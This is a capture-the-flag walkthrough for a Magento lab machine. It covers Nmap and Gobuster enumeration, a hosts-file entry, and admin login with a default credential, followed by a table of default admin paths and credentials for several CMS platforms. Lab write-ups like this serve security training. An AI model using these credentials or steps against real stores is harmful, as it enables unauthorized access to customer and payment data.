⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Ignition presents a Magento e-commerce installation — one of the most widely deployed CMS platforms for online stores. The attack path combines service enumeration with Nmap, virtual host resolution, directory brute-forcing with Gobuster, and exploiting a default admin credential on the Magento backend panel. CMS admin panels with default credentials are a critical and recurring finding in web application assessments.

Tools: nmap · gobuster · browser · /etc/hosts  ·  Difficulty: Very Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
Virtual host resolutionMany web apps require a hostname — IP alone returns a 302 or blank page
Magento admin panel discoveryCMS-specific paths (/admin, /backend) are often hidden but predictable
Default credential testing on CMSMagento, WordPress, Drupal — all have well-known default paths and credentials
Gobuster with CMS wordlistsUsing targeted wordlists speeds up discovery on known CMS platforms
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 80/tcp open http nginx 1.14.2 |_http-title: Did not follow redirect to http://ignition.htb/

What you're seeing: Nmap reveals the server redirects to http://ignition.htb/ — a virtual hostname. Browsing directly by IP won't work. You need to add the hostname to your local hosts file.

03 — Virtual Host Resolution
Add entry to /etc/hosts
sudo echo "10.129.x.x ignition.htb" >> /etc/hosts

Now browse to http://ignition.htb/. The Magento storefront loads. Next, find the admin panel.

ℹ  Virtual hosting is standard in real-world web apps. The /etc/hosts trick is essential whenever Nmap or curl shows a redirect to a hostname that doesn't resolve publicly.
04 — Directory Enumeration
Gobuster scan against the hostname
gobuster dir \ -u http://ignition.htb \ -w /usr/share/seclists/Discovery/Web-Content/common.txt \ -t 50
Relevant output
/admin (Status: 200) [Size: 7092] /contact (Status: 200) /home (Status: 200)

What you're seeing: /admin returns 200 — the Magento admin login panel is exposed. Navigate to http://ignition.htb/admin.

05 — Exploitation — Default Credentials

Magento's default admin credentials are well-documented. Test these before any brute-force attempt.

Common Magento admin credentials
UsernamePassword
adminadmin
adminadmin123
adminmagento
adminqwerty123

admin / qwerty123 grants access to the Magento admin dashboard. The flag is displayed on the dashboard.

✓ Submit the flag string to complete the machine.
⚠  The Magento admin panel gives full control over the e-commerce store — product listings, customer data (including payment info), order history, and the server-side template engine. In a real engagement this is always a critical finding.
06 — CMS Admin Panel Default Paths
CMSDefault admin pathDefault credentials
Magento/admin, /backendadmin / admin123 or qwerty123
WordPress/wp-admin, /wp-login.phpadmin / (set on install)
Drupal/user/login, /adminadmin / admin
Joomla/administratoradmin / admin
PrestaShop/admin (randomised)admin / (set on install)
OpenCart/adminadmin / admin
07 — Key Takeaways
Virtual host enumeration is a critical step that's easy to miss. Many web applications simply don't work when accessed by IP — always check Nmap output for redirect hostnames and add them to /etc/hosts.
ConceptReal-world relevance
Hostname in redirectNmap's http-title script captures redirect targets — never ignore them
Magento admin exposureThe /admin path should be IP-restricted or hidden behind a WAF on production systems
CMS default credsEvery CMS has documented default credentials — test them all before any brute-force
Admin panel = full app controlIn Magento (and most CMS), admin access means arbitrary PHP execution via theme/template editors